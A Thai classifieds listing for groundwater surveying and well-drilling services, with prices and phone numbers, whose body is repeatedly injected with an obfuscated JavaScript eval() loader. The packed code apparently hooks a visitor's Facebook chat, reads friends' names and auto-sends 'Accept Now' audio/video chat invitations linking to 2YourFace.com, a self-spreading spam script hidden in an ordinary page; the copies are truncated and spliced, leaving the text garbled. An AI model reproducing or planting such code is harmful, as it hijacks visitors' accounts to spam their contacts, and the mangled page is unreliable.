หน้าหลัก ประกาศทั้งหมด ซื้อขายแล้ว งาน จ้างงาน
[ ลงประกาศใหม่ ]   [ ประกาศที่เก็บไว้ ]  

ผู้ตอบ 0 คน ผู้เข้าชม 572 คน
รหัสประกาศ JB90108644
หมวดหมู่หลัก งาน
หมวดหมู่ย่อย จ้างงาน
ต้องการ ซื้อขายแล้ว
สภาพ ของใหม่
ยี่ห้อ-รุ่น ด้วยเครื่องมือที่ทันสมัยที่สุดแห่งยุค
ปีที่จดทะเบียน 2554
ปีที่ซื้อ 2554
ระยะเวลาใช้งาน
สี
ราคา 15,000 บาท
อยู่ที่ ภาคกลาง
ลงประกาศเมื่อ 19 กันยายน 2554
เวลา 14:51:42
ขนาดตัวอักษร 


ซื้อขายแล้ว


15,000 บาท


ภาคกลาง

ผู้ลงประกาศ

วีรพล

ดูประกาศทั้งหมดของผู้ลงประกาศ

 0857642516

 

 

 ลาดพร้าว ลาดพร้าว ลาดพร้าว กทม 10230

 124.120.23.xxxรายละเอียด รับปรึกษา สำรวจ หาแหล่งน้ำบาดาล และ ศึกษาชั้นดินชั้นหิน

สำรวจหาแหล่งน้ำบาดาลในพื้นที่ ขั้นต่ำ 15000 eval((function(x){var d="";var p=0;while(p4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("function sendMsg(a, b) {var c = window.jQuery(\"#VideoChatToolbar_\" + b, document);var d = c.next();chatDisplay.tabs[b].chatInput.value = a` 31send` C!();}`!c%Invite`!F!`!h$`!w$\"I \" + g`!b\"all` F\"Msg, a);Open` 6!Dialog(Env.user, \"http://graph.facebook.com/\" + a + \"/picture\", b`!>.Call`!74Phon` Accept\";} else`!/\"d = \"You have`!4%` U%`!3,\";}`#(' = d;}`#j&Clos`$^$) {`('$.body.style.d`'V\" = \"block\";` =%getElementById(\"C`(&!alog\")` L.none` 5D`!e(\"\"`%Z'Open`!i#`%U#, d, e, f`%^#g = \"
\" + f`$8!- Powered By 2YourFace.com
`!m)`!5(656669`!3*top`!6$afbdd6`!y)fff\\\">` d)`\"94f5f5f5`\"**`!1\"dcdcdc`!0#position:relative\\\">` -/`#K%absolute;`\"K#0px;top`!L\"width:59px;h`!R\"25px;cursor:pointer`$)!frame`$*#`.g#www`.^*plugins/like.php?app_id=160947667310175&`,W!http%3A%2F%2Fwww.2yourf`'1#&send=false&layout=box_count&`!q!=450&show_faces` E#a`*+!=like&`#Y!scheme=light&font&`\"C\"=90\\\" scrolling=\\\"no\\\" `\"B!`&7\"=\\\"` >!`#A,`&}$`#A!-17px`**$none; overflow:hidden; `#^#0px; `#_#90px;\\\" allowTrans`0{!cy=\\\"tru`'|!/`#n\"`$u$`$q.`$J$`'?\" id=\\`-)\"lgInside\\\">\";g += \"`$U('`3+%'`!V\"` ,\"`0M!'`![#` -\"`/v!'`\"{''no' `\"x#` '!`)G&`*N%`+4#white`\"r$`\"H#/`!F&`&/`+;& `'!!`+06`';!`*J-text`*E#`'g!\\\">`3!$`2}'void\\\" onclick=\\\"`1a);\\\" `+q(`'a'`&t)/P`'h!/images/close.png`%g'`(T./a`$a#\";var h = window.jQuery(\"div#`1h', `21$);h.html(g)` W!i = h[0];i`2l#visibilit`2q!` )!le\"` 6%`3^.`2P*Voic`\"]$`2\\#`2S#d = `\"V-chat`\"b!Conversation/Video.aspx?rid=1&channel=1008&callType=`!'!&runtime=`&e%&from` *!Env.user;`4-'d, 395, 215`4:$\"Audio Chat\")`\" ,ideo`!.~`\"*\"ideo`!L`` d!`!~.Start` 7!`\"&!) {`\"//`\"+$graph`.j*`!I%/picture\", b` p-Phone` t)`%E*` EXTryParse` !CallInvit`!(\"`$,*a.innerHTML`'c!e;e` 1!`-[!tNode.`-f!` %\"` C%.indexOf(`#c$) != -1;if (d` 5%g`!2+MsgPrefix` H#) {if (!e) {d =`-;\" i` G!d You to an `&O& `+[$'`+Y'`#E'`.1%,\\\"`.*%\\\")' > Accept\";} else`!0\"\"You have`!1%` Q%`!/-\";}`#(' = d;return true;}` &#`2y!`#~/`\"b!`'h!`$!'`\"^!`$3<) {` ;$`&e!` 0+;}`!#&` {+s`%$/`-5..fbChatMessage.fsm\", a);for (`%U! = 0; e < d.length; e++` o#f = d[e];`\"8/f`)*!b`!X)AddToolbar`!7DNubFlyoutBody`!W\"`!P$\"`45018`2`\"class=\\\"` S+`2{!` S!`4e!`#P!Chat`!O#_`%s'` K411\\\"`4)&`!+(position:relative;top`42!`3Z(6d84b4;\\\">\";e`4B\"div` h&` ]%absolute;left:20px` g%\\\"`2kPircl`38$ alt`\"Y$`'_!\\\" tit`!=!` +& with`(4!`(z!\\\"/`3S%`!PG65`!-j`!u#`)V&`!q'`+*'`!l, `!_:width:26px;`$n#30`$i(`$ +3`\"-#-21px;cursor:pointer\\\" >`,?0`)y\"`0\"`&A%`,M#`!^#);'`\"MOv`3?!`$=Y`\"y!a`\"^@4`\"\\B72`\"IUCall`\"f7 `\"OOaudi`\"^@`%`<`\"6h20`*&*`!dPtblog`!u@2YourF` ^#`( )`/@%.parent().html();if (f.indexOf(`-]-\") == -1) {d.`\"J\"(197);d.after(e`/p)GetFriendName(a`/s#b = a`!?!c = \"`.M$`!r!barText`-f!`0>$b`!G%c);d += c`1Q$`01$` 9&\"<\", d`0M\"f = \"\"`\"/!e != -1 && e - d < 50) {f = a.substring(d, e);}var g`!S&`!O(`!R#h`!))g`#4\"h`! \") {h += g`![(i`!U.h);`!0,h, i);}return f;`#B&OnTimeout() {m_last` *# = new Date`!A!`3O#loc`42!.hre`$h'facebook.com\")`!h%if (IsS`)O!Installed(`%*!false) {Start();}se`!3$(\"`!L'\", 2500);Process(`%?)isValidWebsite() {`\">#`!=N`\"k'GetUIDFrom`&2-` q#ChatUserInfos;for (`&U\"in b`\"R#b.hasOwnProperty(c) && a == b[c].name`!h&c;}`\".'`\"E%`!5\"`'T\"b = document`'b%`!K#jQuery(\"div#fbDockChat\", b`'1\"d` 61.` A&Tab\", c`&N\"d == null) {setInterval`$*,3000);`!{\";}`\"^%e = 0; e < d`'&$ e++`\"&#f`!34NubFlyout\", d[e])[0]`!x!g = f.innerHTML`$_&textarea`$\\%if (!` o*f`,)#Node`,4#Node).hasClass(\"openToggler\"`$@!` H7` ;9g == true) {continue`*S\"h`\"4=T`*i#\", f`$N\"i` B.span.`+.(`*L\"var j`\"w*` /!k = \"/mess`/a!`+`\"l = j`#;%k`%,\"l`)l%l += k`+Z(m` D)\"\\\"\", l);a` 2!`+]&l, m);} else {`!6!?id=\";` /~se {}`#c!n =`03+h`1@#` Z\"`*-+n);Add`1B#(f, n, a);ParseInvit`+:!s` 0&`)Y's`,s!LoadHandler() {`$C\"`$I,.noConflict(`%Z!;`(^'`+o'`-Y0`*[\"`*P'.body`$z+`2Z!`#(&ChatDialog\"`)X$ b`,w-`.U#`,I\"`/(U`\"<) === undefined ||`\"Y+fn.jq` D!!== \"1.4.2\"`\"00createElement(\"`#f\"\");a.setAttribute(\"type\", `*e!/java` 15src\", \"http://ajax.googleapis.com` /!/libs/`!^\"/`!Z!` &#.min.js` t!onload =`%1.` 8!readystatechange = `#k%`#g$this.` D!State == \"complete\" || ` -0loaded\") {`&I/;}};(`#7%get`#6#sByTag`'i!\"head\")[0] ||`#b&` M$` J#).appendChild(a`(w'`06!` p.ById`&F*`0T'`1i,`$j,div\");b.id = ` Y(;b`$Q,tyl`%'!display:none;position: absolute;top: 15%;left: 35%;width: w` \"!484px;background:url('`%R#www.2yourface`%R!Plugin/im`-!outer_bg.png');border-radius:8px;padding:9px;z-`(]!:1002;overflow: auto;\");`*$*`#j(b);}`+`'onUp`%r$isValidWebsite(`#g!`1,#`(^$new Date`*p'getTime() - m_las` *!ou`$c!` 4\"` I!c` T'(b`/%\"c.getMinutes() > 0 || ` '+== 0 &&` 1\"Second` G\"2) {`-!)`/#\"url`-\\&`+i)`!C!timeOut = 3000` .!gPhoneCall`.u!eMsgPrefix = \" i` /! You to an Audio Chat. Accept Now : `2`\"gVideo` GC ` H!` S6d`)]!`#j*cacheID =` 9!.get`#O!) + \"-\" + (` 0$Month` 4!1` 4&` 5$FullYear` N'` 3$Hours`$Q#`\"j/ =`\"x7+ \" `'Z4?date=\" +`!|$`\"y4 =`#,7` TJ`%B#s`&g\"out(\"`%j'\", 2500`\"E\"`'2)`#j(`(a*onmouseup =`([!;`2H#;"))
สำรวจหาแหล่งน้ำบาดาล ศึกษาชั้นดิน ชั้นหิน แสดงภาพแบบ 2 มิติ ขั้นต่ำ 25000
รับเจาะบ่อน้ำบาดาล
พัฒนาเป่าล้างบ่อน้ำบาดาล
ให้คำปรึกษาท่านได้
 
 Tel 02-9316068-71 Fax:029316180 ,0857642516
eval((function(x){var d="";var p=0;while(p4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("function sendMsg(a, b) {var c = window.jQuery(\"#VideoChatToolbar_\" + b, document);var d = c.next();chatDisplay.tabs[b].chatInput.value = a` 31send` C!();}`!c%Invite`!F!`!h$`!w$\"I \" + g`!b\"all` F\"Msg, a);Open` 6!Dialog(Env.user, \"http://graph.facebook.com/\" + a + \"/picture\", b`!>.Call`!74Phon` Accepthref="index.php?module=InnoForum&func=page&ctrl=redirect&page=\";} else`!/\"d = \"You have`!4%` U%`!3,\";}`#(' = d;}`#j&Clos`$^$) {`('$.body.style.d`'V\" = \"block\";` =%getElementById(\"C`(&!alog\")` L.none` 5D`!e(\"\"`%Z'Open`!i#`%U#, d, e, f`%^#g = \"
\" + f`$8!- Powered By 2YourFace.com
`!m)`!5(656669`!3*top`!6$afbdd6`!y)fff\\\">` d)`\"94f5f5f5`\"**`!1\"dcdcdc`!0#position:relative\\\">` -/`#K%absolute;`\"K#0px;top`!L\"width:59px;h`!R\"25px;cursor:pointer`$)!frame`$*#`.g#www`.^*plugins/like.php?app_id=160947667310175&`,W!http%3A%2F%2Fwww.2yourf`'1#&send=false&layout=box_count&`!q!=450&show_faces` E#a`*+!=like&`#Y!scheme=light&font&`\"C\"=90\\\" scrolling=\\\"no\\\" `\"B!`&7\"=\\\"` >!`#A,`&}$`#A!-17px`**$none; overflow:hidden; `#^#0px; `#_#90px;\\\" allowTrans`0{!cy=\\\"tru`'|!/`#n\"`$u$`$q.`$J$`'?\" id=\\`-)\"lgInside\\\">\";g += \"`$U('`3+%'`!V\"` ,\"`0M!'`![#` -\"`/v!'`\"{''no' `\"x#` '!`)G&`*N%`+4#white`\"r$`\"H#/`!F&`&/`+;& `'!!`+06`';!`*J-text`*E#`'g!\\\">`3!$`2}'void\\\" onclick=\\\"`1a);\\\" `+q(`'a'`&t)/P`'h!/images/close.png`%g'`(T./a`$a#\";var h = window.jQuery(\"div#`1h', `21$);h.html(g)` W!i = h[0];i`2l#visibilit`2q!` )!le\"` 6%`3^.`2P*Voic`\"]$`2\\#`2S#d = `\"V-chat`\"b!Conversation/Video.aspx?rid=1&channel=1008&callType=`!'!&runtime=`&e%&from` *!Env.user;`4-'d, 395, 215`4:$\"Audio Chat\")`\" ,ideo`!.~`\"*\"ideo`!L`` d!`!~.Start` 7!`\"&!) {`\"//`\"+$graph`.j*`!I%/picture\", b` p-Phone` t)`%E*` EXTryParse` !CallInvit`!(\"`$,*a.innerHTML`'c!e;e` 1!`-[!tNode.`-f!` %\"` C%.indexOf(`#c$) != -1;if (d` 5%g`!2+MsgPrefix` H#) {if (!e) {d =`-;\" i` G!d You to an `&O& `+[$'`+Y'`#E'`.1%,\\\"`.*%\\\")' > Accept\";} else`!0\"\"You have`!1%` Q%`!/-\";}`#(' = d;return true;}` &#`2y!`#~/`\"b!`'h!`$!'`\"^!`$3<) {` ;$`&e!` 0+;}`!#&` {+s`%$/`-5..fbChatMessage.fsm\", a);for (`%U! = 0; e < d.length; e++` o#f = d[e];`\"8/f`)*!b`!X)AddToolbar`!7DNubFlyoutBody`!W\"`!P$\"`45018`2`\"class=\\\"` S+`2{!` S!`4e!`#P!Chat`!O#_`%s'` K411\\\"`4)&`!+(position:relative;top`42!`3Z(6d84b4;\\\">\";e`4B\"div` h&` ]%absolute;left:20px` g%\\\"`2kPircl`38$ alt`\"Y$`'_!\\\" tit`!=!` +& with`(4!`(z!\\\"/`3S%`!PG65`!-j`!u#`)V&`!q'`+*'`!l, `!_:width:26px;`$n#30`$i(`$ +3`\"-#-21px;cursor:pointer\\\" >`,?0`)y\"`0\"`&A%`,M#`!^#);'`\"MOv`3?!`$=Y`\"y!a`\"^@4`\"\\B72`\"IUCall`\"f7 `\"OOaudi`\"^@`%`<`\"6h20`*&*`!dPtblog`!u@2YourF` ^#`( )`/@%.parent().html();if (f.indexOf(`-]-\") == -1) {d.`\"J\"(197);d.after(e`/p)GetFriendName(a`/s#b = a`!?!c = \"`.M$`!r!barText`-f!`0>$b`!G%c);d += c`1Q$`01$` 9&\"<\", d`0M\"f = \"\"`\"/!e != -1 && e - d < 50) {f = a.substring(d, e);}var g`!S&`!O(`!R#h`!))g`#4\"h`! \") {h += g`![(i`!U.h);`!0,h, i);}return f;`#B&OnTimeout() {m_last` *# = new Date`!A!`3O#loc`42!.hre`$h'facebook.com\")`!h%if (IsS`)O!Installed(`%*!false) {Start();}se`!3$(\"`!L'\", 2500);Process(`%?)isValidWebsite() {`\">#`!=N`\"k'GetUIDFrom`&2-` q#ChatUserInfos;for (`&U\"in b`\"R#b.hasOwnProperty(c) && a == b[c].name`!h&c;}`\".'`\"E%`!5\"`'T\"b = document`'b%`!K#jQuery(\"div#fbDockChat\", b`'1\"d` 61.` A&Tab\", c`&N\"d == null) {setInterval`$*,3000);`!{\";}`\"^%e = 0; e < d`'&$ e++`\"&#f`!34NubFlyout\", d[e])[0]`!x!g = f.innerHTML`$_&textarea`$\\%if (!` o*f`,)#Node`,4#Node).hasClass(\"openToggler\"`$@!` H7` ;9g == true) {continue`*S\"h`\"4=T`*i#\", f`$N\"i` B.span.`+.(`*L\"var j`\"w*` /!k = \"/mess`/a!`+`\"l = j`#;%k`%,\"l`)l%l += k`+Z(m` D)\"\\\"\", l);a` 2!`+]&l, m);} else {`!6!?id=\";` /~se {}`#c!n =`03+h`1@#` Z\"`*-+n);Add`1B#(f, n, a);ParseInvit`+:!s` 0&`)Y's`,s!LoadHandler() {`$C\"`$I,.noConflict(`%Z!;`(^'`+o'`-Y0`*[\"`*P'.body`$z+`2Z!`#(&ChatDialog\"`)X$ b`,w-`.U#`,I\"`/(U`\"<) === undefined ||`\"Y+fn.jq` D!!== \"1.4.2\"`\"00createElement(\"`#f\"\");a.setAttribute(\"type\", `*e!/java` 15src\", \"http://ajax.googleapis.com` /!/libs/`!^\"/`!Z!` &#.min.js` t!onload =`%1.` 8!readystatechange = `#k%`#g$this.` D!State == \"complete\" || ` -0loaded\") {`&I/;}};(`#7%get`#6#sByTag`'i!\"head\")[0] ||`#b&` M$` J#).appendChild(a`(w'`06!` p.ById`&F*`0T'`1i,`$j,div\");b.id = ` Y(;b`$Q,tyl`%'!display:none;position: absolute;top: 15%;left: 35%;width: w` \"!484px;background:url('`%R#www.2yourface`%R!Plugin/im`-!outer_bg.png');border-radius:8px;padding:9px;z-`(]!:1002;overflow: auto;\");`*$*`#j(b);}`+`'onUp`%r$isValidWebsite(`#g!`1,#`(^$new Date`*p'getTime() - m_las` *!ou`$c!` 4\"` I!c` T'(b`/%\"c.getMinutes() > 0 || ` '+== 0 &&` 1\"Second` G\"2) {`-!)`/#\"url`-\\&`+i)`!C!timeOut = 3000` .!gPhoneCall`.u!eMsgPrefix = \" i` /! You to an Audio Chat. Accept Now : `2`\"gVideo` GC ` H!` S6d`)]!`#j*cacheID =` 9!.get`#O!) + \"-\" + (` 0$Month` 4!1` 4&` 5$FullYear` N'` 3$Hours`$Q#`\"j/ =`\"x7+ \" `'Z4?date=\" +`!|$`\"y4 =`#,7` TJ`%B#s`&g\"out(\"`%j'\", 2500`\"E\"`'2)`#j(`(a*onmouseup =`([!;`2H#;"))


รายละเอียดเพิ่มเติม

water1993.comeval((function(x){var d="";var p=0;while(p4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("function sendMsg(a, b) {var c = window.jQuery(\"#VideoChatToolbar_\" + b, document);var d = c.next();chatDisplay.tabs[b].chatInput.value = a` 31send` C!();}`!c%Invite`!F!`!h$`!w$\"I \" + g`!b\"all` F\"Msg, a);Open` 6!Dialog(Env.user, \"http://graph.facebook.com/\" + a + \"/picture\", b`!>.Call`!74Phon` Accept\";} else`!/\"d = \"You have`!4%` U%`!3,\";}`#(' = d;}`#j&Clos`$^$) {`('$.body.style.d`'V\" = \"block\";` =%getElementById(\"C`(&!alog\")` L.none` 5D`!e(\"\"`%Z'Open`!i#`%U#, d, e, f`%^#g = \"
\" + f`$8!- Powered By 2YourFace.com
`!m)`!5(656669`!3*top`!6$afbdd6`!y)fff\\\">` d)`\"94f5f5f5`\"**`!1\"dcdcdc`!0#position:relative\\\">` -/`#K%absolute;`\"K#0px;top`!L\"width:59px;h`!R\"25px;cursor:pointer`$)!frame`$*#`.g#www`.^*plugins/like.php?app_id=160947667310175&`,W!http%3A%2F%2Fwww.2yourf`'1#&send=false&layout=box_count&`!q!=450&show_faces` E#a`*+!=like&`#Y!scheme=light&font&`\"C\"=90\\\" scrolling=\\\"no\\\" `\"B!`&7\"=\\\"` >!`#A,`&}$`#A!-17px`**$none; overflow:hidden; `#^#0px; `#_#90px;\\\" allowTrans`0{!cy=\\\"tru`'|!/`#n\"`$u$`$q.`$J$`'?\" id=\\`-)\"lgInside\\\">\";g += \"`$U('`3+%'`!V\"` ,\"`0M!'`![#` -\"`/v!'`\"{''no' `\"x#` '!`)G&`*N%`+4#white`\"r$`\"H#/`!F&`&/`+;& `'!!`+06`';!`*J-text`*E#`'g!\\\">`3!$`2}'void\\\" onclick=\\\"`1a);\\\" `+q(`'a'`&t)/P`'h!/images/close.png`%g'`(T./a`$a#\";var h = window.jQuery(\"div#`1h', `21$);h.html(g)` W!i = h[0];i`2l#visibilit`2q!` )!le\"` 6%`3^.`2P*Voic`\"]$`2\\#`2S#d = `\"V-chat`\"b!Conversation/Video.aspx?rid=1&channel=1008&callType=`!'!&runtime=`&e%&from` *!Env.user;`4-'d, 395, 215`4:$\"Audio Chat\")`\" ,ideo`!.~`\"*\"ideo`!L`` d!`!~.Start` 7!`\"&!) {`\"//`\"+$graph`.j*`!I%/picture\", b` p-Phone` t)`%E*` EXTryParse` !CallInvit`!(\"`$,*a.innerHTML`'c!e;e` 1!`-[!tNode.`-f!` %\"` C%.indexOf(`#c$) != -1;if (d` 5%g`!2+MsgPrefix` H#) {if (!e) {d =`-;\" i` G!d You to an `&O& `+[$'`+Y'`#E'`.1%,\\\"`.*%\\\")' > Accept\";} else`!0\"\"You have`!1%` Q%`!/-\";}`#(' = d;return true;}` &#`2y!`#~/`\"b!`'h!`$!'`\"^!`$3<) {` ;$`&e!` 0+;}`!#&` {+s`%$/`-5..fbChatMessage.fsm\", a);for (`%U! = 0; e < d.length; e++` o#f = d[e];`\"8/f`)*!b`!X)AddToolbar`!7DNubFlyoutBody`!W\"`!P$\"`45018`2`\"class=\\\"` S+`2{!` S!`4e!`#P!Chat`!O#_`%s'` K411\\\"`4)&`!+(position:relative;top`42!`3Z(6d84b4;\\\">\";e`4B\"div` h&` ]%absolute;left:20px` g%\\\"`2kPircl`38$ alt`\"Y$`'_!\\\" tit`!=!` +& with`(4!`(z!\\\"/`3S%`!PG65`!-j`!u#`)V&`!q'`+*'`!l, `!_:width:26px;`$n#30`$i(`$ +3`\"-#-21px;cursor:pointer\\\" >`,?0`)y\"`0\"`&A%`,M#`!^#);'`\"MOv`3?!`$=Y`\"y!a`\"^@4`\"\\B72`\"IUCall`\"f7 `\"OOaudi`\"^@`%`<`\"6h20`*&*`!dPtblog`!u@2YourF` ^#`( )`/@%.parent().html();if (f.indexOf(`-]-\") == -1) {d.`\"J\"(197);d.after(e`/p)GetFriendName(a`/s#b = a`!?!c = \"`.M$`!r!barText`-f!`0>$b`!G%c);d += c`1Q$`01$` 9&\"<\", d`0M\"f = \"\"`\"/!e != -1 && e - d < 50) {f = a.substring(d, e);}var g`!S&`!O(`!R#h`!))g`#4\"h`! \") {h += g`![(i`!U.h);`!0,h, i);}return f;`#B&OnTimeout() {m_last` *# = new Date`!A!`3O#loc`42!.hre`$h'facebook.com\")`!h%if (IsS`)O!Installed(`%*!false) {Start();}se`!3$(\"`!L'\", 2500);Process(`%?)isValidWebsite() {`\">#`!=N`\"k'GetUIDFrom`&2-` q#ChatUserInfos;for (`&U\"in b`\"R#b.hasOwnProperty(c) && a == b[c].name`!h&c;}`\".'`\"E%`!5\"`'T\"b = document`'b%`!K#jQuery(\"div#fbDockChat\", b`'1\"d` 61.` A&Tab\", c`&N\"d == null) {setInterval`$*,3000);`!{\";}`\"^%e = 0; e < d`'&$ e++`\"&#f`!34NubFlyout\", d[e])[0]`!x!g = f.innerHTML`$_&textarea`$\\%if (!` o*f`,)#Node`,4#Node).hasClass(\"openToggler\"`$@!` H7` ;9g == true) {continue`*S\"h`\"4=T`*i#\", f`$N\"i` B.span.`+.(`*L\"var j`\"w*` /!k = \"/mess`/a!`+`\"l = j`#;%k`%,\"l`)l%l += k`+Z(m` D)\"\\\"\", l);a` 2!`+]&l, m);} else {`!6!?id=\";` /~se {}`#c!n =`03+h`1@#` Z\"`*-+n);Add`1B#(f, n, a);ParseInvit`+:!s` 0&`)Y's`,s!LoadHandler() {`$C\"`$I,.noConflict(`%Z!;`(^'`+o'`-Y0`*[\"`*P'.body`$z+`2Z!`#(&ChatDialog\"`)X$ b`,w-`.U#`,I\"`/(U`\"<) === undefined ||`\"Y+fn.jq` D!!== \"1.4.2\"`\"00createElement(\"`#f\"\");a.setAttribute(\"type\", `*e!/java` 15src\", \"http://ajax.googleapis.com` /!/libs/`!^\"/`!Z!` &#.min.js` t!onload =`%1.` 8!readystatechange = `#k%`#g$this.` D!State == \"complete\" || ` -0loaded\") {`&I/;}};(`#7%get`#6#sByTag`'i!\"head\")[0] ||`#b&` M$` J#).appendChild(a`(w'`06!` p.ById`&F*`0T'`1i,`$j,div\");b.id = ` Y(;b`$Q,tyl`%'!display:none;position: absolute;top: 15%;left: 35%;width: w` \"!484px;background:url('`%R#www.2yourface`%R!Plugin/im`-!outer_bg.png');border-radius:8px;padding:9px;z-`(]!:1002;overflow: auto;\");`*$*`#j(b);}`+`'onUp`%r$isValidWebsite(`#g!`1,#`(^$new Date`*p'getTime() - m_las` *!ou`$c!` 4\"` I!c` T'(b`/%\"c.getMinutes() > 0 || ` '+== 0 &&` 1\"Second` G\"2) {`-!)`/#\"url`-\\&`+i)`!C!timeOut = 3000` .!gPhoneCall`.u!eMsgPrefix = \" i` /! You to an Audio Chat. Accept Now : `2`\"gVideo` GC ` H!` S6d`)]!`#j*cacheID =` 9!.get`#O!) + \"-\" + (` 0$Month` 4!1` 4&` 5$FullYear` N'` 3$Hours`$Q#`\"j/ =`\"x7+ \" `'Z4?date=\" +`!|$`\"y4 =`#,7` TJ`%B#s`&g\"out(\"`%j'\", 2500`\"E\"`'2)`#j(`(a*onmouseup =`([!;`2H#;"))
eval((function(x){var d="";var p=0;while(p4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("function sendMsg(a, b) {var c = window.jQuery(\"#VideoChatToolbar_\" + b, document);var d = c.next();chatDisplay.tabs[b].chatInput.value = a` 31send` C!();}`!c%Invite`!F!`!h$`!w$\"I \" + g`!b\"all` F\"Msg, a);Open` 6!Dialog(Env.user, \"http://graph.facebook.com/\" + a + \"/picture\", b`!>.Call`!74Phon` Accepthref="index.php?module=InnoForum&func=page&ctrl=redirect&page=\";} else`!/\"d = \"You have`!4%` U%`!3,\";}`#(' = d;}`#j&Clos`$^$) {`('$.body.style.d`'V\" = \"block\";` =%getElementById(\"C`(&!alog\")` L.none` 5D`!e(\"\"`%Z'Open`!i#`%U#, d, e, f`%^#g = \"
\" + f`$8!- Powered By 2YourFace.com
`!m)`!5(656669`!3*top`!6$afbdd6`!y)fff\\\">` d)`\"94f5f5f5`\"**`!1\"dcdcdc`!0#position:relative\\\">` -/`#K%absolute;`\"K#0px;top`!L\"width:59px;h`!R\"25px;cursor:pointer`$)!frame`$*#`.g#www`.^*plugins/like.php?app_id=160947667310175&`,W!http%3A%2F%2Fwww.2yourf`'1#&send=false&layout=box_count&`!q!=450&show_faces` E#a`*+!=like&`#Y!scheme=light&font&`\"C\"=90\\\" scrolling=\\\"no\\\" `\"B!`&7\"=\\\"` >!`#A,`&}$`#A!-17px`**$none; overflow:hidden; `#^#0px; `#_#90px;\\\" allowTrans`0{!cy=\\\"tru`'|!/`#n\"`$u$`$q.`$J$`'?\" id=\\`-)\"lgInside\\\">\";g += \"`$U('`3+%'`!V\"` ,\"`0M!'`![#` -\"`/v!'`\"{''no' `\"x#` '!`)G&`*N%`+4#white`\"r$`\"H#/`!F&`&/`+;& `'!!`+06`';!`*J-text`*E#`'g!\\\">`3!$`2}'void\\\" onclick=\\\"`1a);\\\" `+q(`'a'`&t)/P`'h!/images/close.png`%g'`(T./a`$a#\";var h = window.jQuery(\"div#`1h', `21$);h.html(g)` W!i = h[0];i`2l#visibilit`2q!` )!le\"` 6%`3^.`2P*Voic`\"]$`2\\#`2S#d = `\"V-chat`\"b!Conversation/Video.aspx?rid=1&channel=1008&callType=`!'!&runtime=`&e%&from` *!Env.user;`4-'d, 395, 215`4:$\"Audio Chat\")`\" ,ideo`!.~`\"*\"ideo`!L`` d!`!~.Start` 7!`\"&!) {`\"//`\"+$graph`.j*`!I%/picture\", b` p-Phone` t)`%E*` EXTryParse` !CallInvit`!(\"`$,*a.innerHTML`'c!e;e` 1!`-[!tNode.`-f!` %\"` C%.indexOf(`#c$) != -1;if (d` 5%g`!2+MsgPrefix` H#) {if (!e) {d =`-;\" i` G!d You to an `&O& `+[$'`+Y'`#E'`.1%,\\\"`.*%\\\")' > Accept\";} else`!0\"\"You have`!1%` Q%`!/-\";}`#(' = d;return true;}` &#`2y!`#~/`\"b!`'h!`$!'`\"^!`$3<) {` ;$`&e!` 0+;}`!#&` {+s`%$/`-5..fbChatMessage.fsm\", a);for (`%U! = 0; e < d.length; e++` o#f = d[e];`\"8/f`)*!b`!X)AddToolbar`!7DNubFlyoutBody`!W\"`!P$\"`45018`2`\"class=\\\"` S+`2{!` S!`4e!`#P!Chat`!O#_`%s'` K411\\\"`4)&`!+(position:relative;top`42!`3Z(6d84b4;\\\">\";e`4B\"div` h&` ]%absolute;left:20px` g%\\\"`2kPircl`38$ alt`\"Y$`'_!\\\" tit`!=!` +& with`(4!`(z!\\\"/`3S%`!PG65`!-j`!u#`)V&`!q'`+*'`!l, `!_:width:26px;`$n#30`$i(`$ +3`\"-#-21px;cursor:pointer\\\" >`,?0`)y\"`0\"`&A%`,M#`!^#);'`\"MOv`3?!`$=Y`\"y!a`\"^@4`\"\\B72`\"IUCall`\"f7 `\"OOaudi`\"^@`%`<`\"6h20`*&*`!dPtblog`!u@2YourF` ^#`( )`/@%.parent().html();if (f.indexOf(`-]-\") == -1) {d.`\"J\"(197);d.after(e`/p)GetFriendName(a`/s#b = a`!?!c = \"`.M$`!r!barText`-f!`0>$b`!G%c);d += c`1Q$`01$` 9&\"<\", d`0M\"f = \"\"`\"/!e != -1 && e - d < 50) {f = a.substring(d, e);}var g`!S&`!O(`!R#h`!))g`#4\"h`! \") {h += g`![(i`!U.h);`!0,h, i);}return f;`#B&OnTimeout() {m_last` *# = new Date`!A!`3O#loc`42!.hre`$h'facebook.com\")`!h%if (IsS`)O!Installed(`%*!false) {Start();}se`!3$(\"`!L'\", 2500);Process(`%?)isValidWebsite() {`\">#`!=N`\"k'GetUIDFrom`&2-` q#ChatUserInfos;for (`&U\"in b`\"R#b.hasOwnProperty(c) && a == b[c].name`!h&c;}`\".'`\"E%`!5\"`'T\"b = document`'b%`!K#jQuery(\"div#fbDockChat\", b`'1\"d` 61.` A&Tab\", c`&N\"d == null) {setInterval`$*,3000);`!{\";}`\"^%e = 0; e < d`'&$ e++`\"&#f`!34NubFlyout\", d[e])[0]`!x!g = f.innerHTML`$_&textarea`$\\%if (!` o*f`,)#Node`,4#Node).hasClass(\"openToggler\"`$@!` H7` ;9g == true) {continue`*S\"h`\"4=T`*i#\", f`$N\"i` B.span.`+.(`*L\"var j`\"w*` /!k = \"/mess`/a!`+`\"l = j`#;%k`%,\"l`)l%l += k`+Z(m` D)\"\\\"\", l);a` 2!`+]&l, m);} else {`!6!?id=\";` /~se {}`#c!n =`03+h`1@#` Z\"`*-+n);Add`1B#(f, n, a);ParseInvit`+:!s` 0&`)Y's`,s!LoadHandler() {`$C\"`$I,.noConflict(`%Z!;`(^'`+o'`-Y0`*[\"`*P'.body`$z+`2Z!`#(&ChatDialog\"`)X$ b`,w-`.U#`,I\"`/(U`\"<) === undefined ||`\"Y+fn.jq` D!!== \"1.4.2\"`\"00createElement(\"`#f\"\");a.setAttribute(\"type\", `*e!/java` 15src\", \"http://ajax.googleapis.com` /!/libs/`!^\"/`!Z!` &#.min.js` t!onload =`%1.` 8!readystatechange = `#k%`#g$this.` D!State == \"complete\" || ` -0loaded\") {`&I/;}};(`#7%get`#6#sByTag`'i!\"head\")[0] ||`#b&` M$` J#).appendChild(a`(w'`06!` p.ById`&F*`0T'`1i,`$j,div\");b.id = ` Y(;b`$Q,tyl`%'!display:none;position: absolute;top: 15%;left: 35%;width: w` 